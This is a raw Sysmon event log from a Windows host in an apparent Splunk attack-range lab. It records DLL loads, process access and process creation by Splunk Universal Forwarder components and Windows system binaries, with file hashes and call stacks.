http://www.openssl.org/ssleay32.dllMD5=0FE6D3D4B3F4B0F5502371832D12BB8E,SHA256=3DF79909021C72E70D2AE273587296E5E2D5F77315011B5C3115CFA359682647,IMPHASH=E09B42A7EA1725DA2CD99223AD969C63trueSplunk, Inc.Valid 734700x800000000000000098854Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166,IMPHASH=D6E06125849E8565A50F366A0149FB40trueMicrosoft WindowsValid 734700x800000000000000098853Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=FBA0D04D5A8AEA25D86EC623A14D0056,SHA256=D64FE508393C40160D1EFB22149C69763CBAA921BD1BC74C8D4AE59A10C3B767,IMPHASH=987AB6B8B03EE421D8CC59EAFE452916trueSplunk, Inc.Valid 734700x800000000000000098852Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3,IMPHASH=57ABD1FDE351971A01E912069E11B44CtrueMicrosoft WindowsValid 734700x800000000000000098851Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4,IMPHASH=07D6F84E3C8FD0D2C32F9398A0369BAFtrueMicrosoft WindowsValid 734700x800000000000000098850Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438,IMPHASH=C7DF3F2CF025F0BEDA797705E4F4AFBBtrueMicrosoft WindowsValid 734700x800000000000000098849Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\secur32.dll10.0.14393.2273 (rs1_release_1.180427-1811)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecur32.dllMD5=BCF1B2F76F8A3A3E9E8F4D4322954651,SHA256=46B327CD50E728CBC22BD80F39DCEF2789AB780C77B6D285EEB90126B06EEEB5,IMPHASH=0D8FF9DE2DA5C07D680347B1A098E759trueMicrosoft WindowsValid 734700x800000000000000098848Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.10libxml2 librarylibxml2-libxml2.dllMD5=20596DB2126E9F188727597F0FCC7CDB,SHA256=BAD6246A2B43B07FE80643DE40B0CE49751C8E0B95B076AD94E59F16CE8D8C0C,IMPHASH=6DA659461618DB73B9BD17D114677D20trueSplunk, Inc.Valid 734700x800000000000000098847Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAE,IMPHASH=B511E4B82A44D3731CDA46A74F5D57EAtrueMicrosoft WindowsValid 10341000x800000000000000098846Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-A44C-6294-0901-000000005502}53725392C:\Windows\system32\conhost.exe{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x800000000000000098845Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484F,IMPHASH=05349EBAA635D77714868763D44881E9trueMicrosoft WindowsValid 734700x800000000000000098844Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\kernel32.dll10.0.14393.5066 (rs1_release.220401-1841)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=E258A076D1B87D41F724E431B3293BA5,SHA256=0670462AC0932F314B2E4A0A20B4B6F96C024C2310BD2AF21B20BF7A8EC9FF8E,IMPHASH=3CE0779E0F4E275CD51A359A98CCC682trueMicrosoft WindowsValid 734700x800000000000000098843Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x800000000000000098842Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.2.5Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exeMD5=C8BED8D054FDE4C4222F39C750539874,SHA256=765D1E768D7027343C681DF3B2F6113ED0337F7179CDAE9CF89979A8725CE490,IMPHASH=5DCBAD7446F97D73DA1DA121D8CD8778trueSplunk, Inc.Valid 10341000x800000000000000098841Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098840Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098839Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098838Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098837Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-A252-6294-0500-000000005502}416432C:\Windows\system32\csrss.exe{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000098836Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.234{326FD73D-A44C-6294-0501-000000005502}51646008C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000098835Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:51.235{326FD73D-C0B7-6294-340B-000000005502}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.2.5Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{326FD73D-A253-6294-E703-000000000000}0x3e70SystemMD5=C8BED8D054FDE4C4222F39C750539874,SHA256=765D1E768D7027343C681DF3B2F6113ED0337F7179CDAE9CF89979A8725CE490,IMPHASH=5DCBAD7446F97D73DA1DA121D8CD8778{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000098834Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:50.999{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C8E627963FF2D3A8E27D410D93B3DC50,SHA256=7F7F087930259F6D5A2D7B066CE98EF8BDB5CD8B6781160ED8A81450DB94043C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098938Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.437{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D15F823AD3AB7C3005A132A1CD698598,SHA256=51E7AE881035E311DFBA0DA7FDE88552A010D69383F77626CAEBDEA5416B39A4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 734700x800000000000000098937Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.218{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659C,IMPHASH=94524C03C5380F78283785F1E05E667DtrueMicrosoft WindowsValid 734700x800000000000000098936Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.202{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146,IMPHASH=F67CBD9561C1FEF51B817BA184E81D2EtrueMicrosoft WindowsValid 734700x800000000000000098935Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.202{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1A,IMPHASH=E7FD2920222985E31019D022BB39EFBEtrueMicrosoft WindowsValid 734700x800000000000000098934Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.062{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FE,IMPHASH=9E9C9DFD04CDDF2B6F1412BF096AEAF4trueMicrosoft WindowsValid 734700x800000000000000098933Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.062{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862,IMPHASH=C918D75BDB7774C087BB6C0C9C0A7686trueMicrosoft WindowsValid 734700x800000000000000098932Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.062{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778C,IMPHASH=96CBD1B5C0EA88B677BA3BB5FD009869trueMicrosoft WindowsValid 734700x800000000000000098931Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.062{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\srvcli.dll10.0.14393.5066 (rs1_release.220401-1841)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=75E3DE473374E0BCBBD1EC60036A93EC,SHA256=23EBE577D2080D4C7532184B69E44BF640BB44084F9046A5AF364268A7BDB1EC,IMPHASH=6CC8301D560C9DC6CB13A6320F3A3B1FtrueMicrosoft WindowsValid 734700x800000000000000098930Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.062{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\wkscli.dll10.0.14393.5066 (rs1_release.220401-1841)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3D375474E2FE9A77D243E35954287188,SHA256=7850F11166D7CACED6F628033524ED86191AE92772000AFA677E59A664396E8C,IMPHASH=6990BA83B94C81786A84E6C44E699D03trueMicrosoft WindowsValid 734700x800000000000000098929Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.062{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923,IMPHASH=7D1B32891B9173ED71ED6C18DEFEE578trueMicrosoft WindowsValid 734700x800000000000000098928Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.062{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\netapi32.dll10.0.14393.5125 (rs1_release.220429-1732)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=E8FF656B90334BED915B2BC6BBE57C9A,SHA256=8BB399AD98B9D9C637D09EB48306B1E80C50BAA7D1C9811595D9042E4294173C,IMPHASH=FE007B4B6CED5075C98434207FFF87E0trueMicrosoft WindowsValid 734700x800000000000000098927Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FF,IMPHASH=ADF99B9EA3A1F76C33522F96772BC4DDtrueMicrosoft CorporationValid 734700x800000000000000098926Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74,IMPHASH=7C2E79D83754439DC7DE7882DCB4238DtrueMicrosoft WindowsValid 734700x800000000000000098925Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9,IMPHASH=2CB5DA5225E972A08F32D04B8085DC7EtrueMicrosoft CorporationValid 734700x800000000000000098924Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\Wldap32.dll10.0.14393.5125 (rs1_release.220429-1732)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=5760D3C7E030C7F1984753F6050BF4DA,SHA256=DCB422305A2B3160F8FD53B3F3841B1EE80E4D81D2599FA02CEA9BBC5E5E2834,IMPHASH=D13722FCCB1CDD38974ADB7277D98799trueMicrosoft WindowsValid 734700x800000000000000098923Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5,IMPHASH=5B59892514923CABE9B70CFE22A3F59AtrueMicrosoft WindowsValid 734700x800000000000000098922Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54,IMPHASH=AFF2E9AF6DD20912DC1E604BDBCA3761trueMicrosoft WindowsValid 734700x800000000000000098921Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75E,IMPHASH=8987D71C85BB2C13D3D90194331F962FtrueMicrosoft WindowsValid 734700x800000000000000098920Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\winspool.drv10.0.14393.5125 (rs1_release.220429-1732)Windows Spooler DriverMicrosoft® Windows® Operating SystemMicrosoft 